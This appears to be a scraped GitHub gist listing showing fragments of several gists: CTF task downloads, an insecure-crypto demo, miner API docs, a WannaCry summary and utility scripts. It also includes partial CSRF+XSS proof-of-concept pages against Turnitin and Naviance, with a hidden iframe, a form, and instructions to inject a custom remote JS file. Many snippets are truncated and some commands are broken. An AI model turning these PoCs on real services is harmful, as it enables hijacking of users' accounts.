shipping bugs

Aaron Esau Arinerron

sirdarckcat /
Last active Jun 22, 2019
download all CTF tasks


wget && chmod +x
mkdir -p google-ctf-2019
DATABASE_URL= ./ google-ctf-2019/ctf
DATABASE_URL= ./ google-ctf-2019/bq
defuse / example.js
Created May 12, 2018
Insecure code that's visually identical to secure code.
let KEY = new Uint8Array(16);
function generate_key() {
let KEY = new Uint8Array(16);
return KEY;
KEY = generate_key();
document.body.innerText = KEY;
View That one program
var_30= qword ptr -30h
var_24= dword ptr -24h
var_20= dword ptr -20h
var_1C= dword ptr -1Ch
var_18= dword ptr -18h
var_14= dword ptr -14h
var_10= dword ptr -10h
var_8= qword ptr -8
push rbp
View crypto
ivy / API.txt
Created Jul 3, 2017
Claymore JSON-RPC API documentation (from Claymore v9.6)
EthMan uses raw TCP/IP connections (not HTTP) for remote management and statistics. Optionally, a "psw" field is added to requests if a password for remote management is set for the miner.
The following commands are available (JSON format):
{"result": ["9.3 - ETH", "21", "182724;51;0", "30502;30457;30297;30481;30479;30505", "0;0;0", "off;off;off;off;off;off", "53;71;57;67;61;72;55;70;59;71;61;70", "", "0;0;0;0"]}
Arinerron / turnitin.html
Created May 23, 2017
CSRF+XSS / proof of concept
<title> PoC</title>
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "".

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses EternalBlue (MS17-010) to propagate.
  • Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

rueberger /
Created Apr 20, 2017
Simple script that parses and returns the output of nvidia-smi
import commands
import numpy as np
def fetch_gpu_status():
    """ Run nvidia-smi and parse the output
    requires Python 2 only dependency
    """
    status_code, output = commands.getstatusoutput('nvidia-smi')
Arinerron / naviance.html
Created Apr 11, 2017
Naviance CSRF+XSS / proof of concept
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "".
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='' target="csrf-frame" id="csrf-form">
Arinerron /
Created Jan 17, 2017
Installs Python-3.4.2
tar xvf Python-3.4.2.tgz
cd Python-3.4.2
make test
sudo make install
cd ..
rm -rf Python-3.4.2
rm Python-3.4.2.tgz